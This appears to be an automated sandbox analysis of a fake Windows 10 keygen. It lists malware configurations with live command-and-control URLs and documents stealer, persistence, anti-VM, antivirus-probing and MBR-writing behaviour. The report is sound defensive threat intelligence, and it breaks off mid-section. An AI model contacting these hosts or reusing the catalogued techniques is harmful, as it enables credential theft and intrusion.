Analysis
-
max time kernel
600s -
max time network
600s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-03-2021 14:22
Static task
static1
Behavioral task
behavioral1
Sample
Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.exe
Resource
win7v20201028
General
-
Target
Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.exe
-
Size
8.2MB
-
MD5
456c5963a08824d34303db846ff8bf14
-
SHA1
c03e0c681008417923c0280a204fe7b54087154b
-
SHA256
413b1728b45d73f2d18d016edf377a461d58eec8bb662825713666d696cd3cdf
-
SHA512
6a14d4d6e57964f4fa79787c0badbac4773587874871f2095e01dcf3ab091d78a4892a63b6a74de5363d6e9a80865e4a984d63fe4f8c762b58de1193493754c8
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
raccoon
51c194bfb6e404af0e5ff0b93b443907a6a845b1
-
url4cnc
https://telete.in/h_focus_1
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
e71b51d358b75fe1407b56bf2284e3fac50c860f
-
url4cnc
https://telete.in/oidmrwednesday
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
Processes:
resource yara_rule behavioral3/memory/7872-519-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral3/memory/7872-522-0x00000000039E0000-0x000000000423D000-memory.dmp family_glupteba behavioral3/memory/7872-523-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 9 IoCs
Processes:
resource yara_rule behavioral3/memory/3232-207-0x0000000002070000-0x0000000002098000-memory.dmp family_redline behavioral3/memory/3232-214-0x0000000002170000-0x0000000002196000-memory.dmp family_redline behavioral3/memory/5316-372-0x0000000000400000-0x0000000000426000-memory.dmp family_redline behavioral3/memory/6404-462-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral3/memory/10060-880-0x0000000002730000-0x000000000275D000-memory.dmp family_redline behavioral3/memory/10060-882-0x00000000052D0000-0x00000000052FC000-memory.dmp family_redline behavioral3/memory/9500-1036-0x0000000004BF0000-0x0000000004C2E000-memory.dmp family_redline behavioral3/memory/9500-1039-0x00000000071C0000-0x00000000071FC000-memory.dmp family_redline behavioral3/memory/5916-1578-0x0000000000400000-0x0000000000426000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\1615299557069.exe Nirsoft C:\Users\Admin\AppData\Roaming\1615299557069.exe Nirsoft C:\Users\Admin\AppData\Roaming\1615299561287.exe Nirsoft C:\Users\Admin\AppData\Roaming\1615299561287.exe Nirsoft C:\Users\Admin\AppData\Roaming\1615299566569.exe Nirsoft C:\Users\Admin\AppData\Roaming\1615299566569.exe Nirsoft -
Executes dropped EXE 47 IoCs
Processes:
keygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exekey.exeAD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exeaskinstall20.exe1615299557069.exeInstall.exemultitimer.exemd2_2efs.exe1615299561287.exefile.exemultitimer.exeB9B1.tmp.exeBB29.tmp.exemultitimer.exeB9B1.tmp.exe1615299566569.exebf5zejfu4ks.exeSetup3310.exeaskinstall24.exeyp10y2jkrn1.exeml2kmot14q2.exeSetup3310.tmpchashepro3.exeapp.exevpn.exechashepro3.tmpml2kmot14q2.tmpvpn.tmpIBInstaller_97039.exeIBInstaller_97039.tmpBrava.exeVenita.exewinlthst.exeapp.exeBTRSetp.exemex.exezm2envmeni4.exechrome_proxy.exezm2envmeni4.tmpSetup.exeSetup.tmppid process 752 keygen-pr.exe 736 keygen-step-1.exe 496 keygen-step-3.exe 1304 keygen-step-4.exe 64 key.exe 2084 Setup.exe 3924 key.exe 2412 AD754B4D3FE2C4EE.exe 2784 AD754B4D3FE2C4EE.exe 1136 askinstall20.exe 4144 1615299557069.exe 4176 Install.exe 4280 multitimer.exe 4328 md2_2efs.exe 4016 1615299561287.exe 4864 file.exe 4972 multitimer.exe 5020 B9B1.tmp.exe 4352 BB29.tmp.exe 1576 multitimer.exe 4152 B9B1.tmp.exe 1232 1615299566569.exe 4424 bf5zejfu4ks.exe 4468 Setup3310.exe 4512 askinstall24.exe 4536 yp10y2jkrn1.exe 4588 ml2kmot14q2.exe 4600 Setup3310.tmp 4636 chashepro3.exe 4656 app.exe 4704 vpn.exe 4728 chashepro3.tmp 4740 ml2kmot14q2.tmp 4816 vpn.tmp 4832 IBInstaller_97039.exe 4956 IBInstaller_97039.tmp 3232 Brava.exe 5064 Venita.exe 584 winlthst.exe 4532 app.exe 5088 BTRSetp.exe 4248 mex.exe 4148 zm2envmeni4.exe 4568 chrome_proxy.exe 4308 zm2envmeni4.tmp 4580 Setup.exe 5164 Setup.tmp -
Looks for VMWare Tools registry key 2 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\gdiview.msi office_xlm_macros -
Loads dropped DLL 22 IoCs
Processes:
MsiExec.exeSetup3310.tmpml2kmot14q2.tmpvpn.tmpIBInstaller_97039.tmpzm2envmeni4.tmpSetup.tmppid process 3488 MsiExec.exe 4600 Setup3310.tmp 4600 Setup3310.tmp 4740 ml2kmot14q2.tmp 4816 vpn.tmp 4816 vpn.tmp 4956 IBInstaller_97039.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4308 zm2envmeni4.tmp 4308 zm2envmeni4.tmp 4308 zm2envmeni4.tmp 4308 zm2envmeni4.tmp 4308 zm2envmeni4.tmp 4308 zm2envmeni4.tmp 4308 zm2envmeni4.tmp 5164 Setup.tmp 5164 Setup.tmp -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
multitimer.exezm2envmeni4.tmpdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cqxcjktvg5 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\1WVCXOJJ02\\multitimer.exe\" 1 3.1615299780.604784c41cab1" multitimer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\6971372 = "\"C:\\Users\\Admin\\AppData\\Roaming\\fqdzfuoap2u\\zm2envmeni4.exe\" /VERYSILENT" zm2envmeni4.tmp -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
Processes:
multitimer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
md2_2efs.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 56 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 579 ipinfo.io 1824 ipinfo.io 1468 checkip.amazonaws.com 1633 ipinfo.io 1056 ipinfo.io 1821 ipinfo.io 422 checkip.amazonaws.com 254 ipinfo.io 1233 ip-api.com 938 ipinfo.io 1259 ipinfo.io 1327 ipinfo.io 143 ip-api.com 468 ipinfo.io 530 ipinfo.io 790 ipinfo.io 1182 checkip.amazonaws.com 103 ipinfo.io 262 ipinfo.io 577 ipinfo.io 717 checkip.amazonaws.com 1658 checkip.amazonaws.com 1741 ipinfo.io 2084 ipinfo.io 70 api.ipify.org 411 ip-api.com 517 checkip.amazonaws.com 1119 ipinfo.io 1129 ipinfo.io 1758 ipinfo.io 1900 ipinfo.io 101 ipinfo.io 184 ipinfo.io 281 ipinfo.io 1925 ipinfo.io 2030 ip-api.com 191 checkip.amazonaws.com 616 ipinfo.io 1226 ipinfo.io 1256 ipinfo.io 1549 ipinfo.io 1396 ip-api.com 1608 ipinfo.io 1075 checkip.amazonaws.com 1297 ipinfo.io 1915 ipinfo.io 709 ip-api.com 1318 ipinfo.io 1054 ipinfo.io 1271 ipinfo.io 1066 ipinfo.io 1361 ipinfo.io 1722 ipinfo.io 1826 ipinfo.io 1831 ipinfo.io 1973 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
multitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3996 3784 WerFault.exe MicrosoftEdge.exe 10016 9764 WerFault.exe 1461074104.exe 15040 9876 WerFault.exe MicrosoftEdgeCP.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
Setup.exeAD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exedescription ioc process File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 AD754B4D3FE2C4EE.exe File opened for modification \??\PhysicalDrive0 AD754B4D3FE2C4EE.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Setup.exepid process 2084 Setup.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
key.exeAD754B4D3FE2C4EE.exeB9B1.tmp.exedescription pid process target process PID 64 set thread context of 3924 64 key.exe key.exe PID 2412 set thread context of 1576 2412 AD754B4D3FE2C4EE.exe firefox.exe PID 2412 set thread context of 5104 2412 AD754B4D3FE2C4EE.exe firefox.exe PID 2412 set thread context of 1620 2412 AD754B4D3FE2C4EE.exe firefox.exe PID 5020 set thread context of 4152 5020 B9B1.tmp.exe B9B1.tmp.exe -
Drops file in Program Files directory 64 IoCs
Processes:
vpn.tmpIBInstaller_97039.tmpapp.exechashepro3.tmpdescription ioc process File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll vpn.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-II2JO.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-38KTB.tmp IBInstaller_97039.tmp File created C:\Program Files\UV9FA7XJF2\UV9FA7XJF.exe.config app.exe File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\mex.exe chashepro3.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Delphi.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Globalization.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-E56BA.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-5UCIQ.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-4U374.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-UOK87.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-14J0I.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-M1O14.tmp vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Refactoring.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-D4BS7.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-DI747.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-1BO4H.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Interop.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\am805.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-49R69.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-F6DCB.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-CLDMK.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-9MH82.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg vpn.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-UN86K.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-OTSO0.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\JCleaner\is-5390H.tmp chashepro3.tmp File opened for modification C:\Program Files (x86)\JCleaner\unins000.dat chashepro3.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Delphi.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\ServiceModelInstallRC.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-F6O5H.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-OMR68.tmp vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\Brava.exe chashepro3.tmp File created C:\Program Files (x86)\MaskVPN\is-QESBT.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-DS957.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-OQ01N.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-TAMFF.tmp vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\Venita.exe chashepro3.tmp File created C:\Program Files (x86)\JCleaner\is-L94EK.tmp chashepro3.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-E8QN7.tmp IBInstaller_97039.tmp File created C:\Program Files\UV9FA7XJF2\uninstaller.exe.config app.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-B57TT.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Host.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ipseccmd.exe vpn.tmp File created C:\Program Files\UV9FA7XJF2\uninstaller.exe app.exe File created C:\Program Files (x86)\MaskVPN\is-M4KFT.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-IHULJ.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-HV4O1.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-47B2D.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-JH9GN.tmp vpn.tmp File created C:\Program Files (x86)\JCleaner\is-C8IHM.tmp chashepro3.tmp File created C:\Program Files\UV9FA7XJF2\UV9FA7XJF.exe app.exe File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-DLG83.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-PV18U.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-DJIEH.tmp vpn.tmp -
Drops file in Windows directory 2 IoCs
Processes:
multitimer.exedescription ioc process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
AD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc AD754B4D3FE2C4EE.exe -
Delays execution with timeout.exe 4 IoCs
Processes:
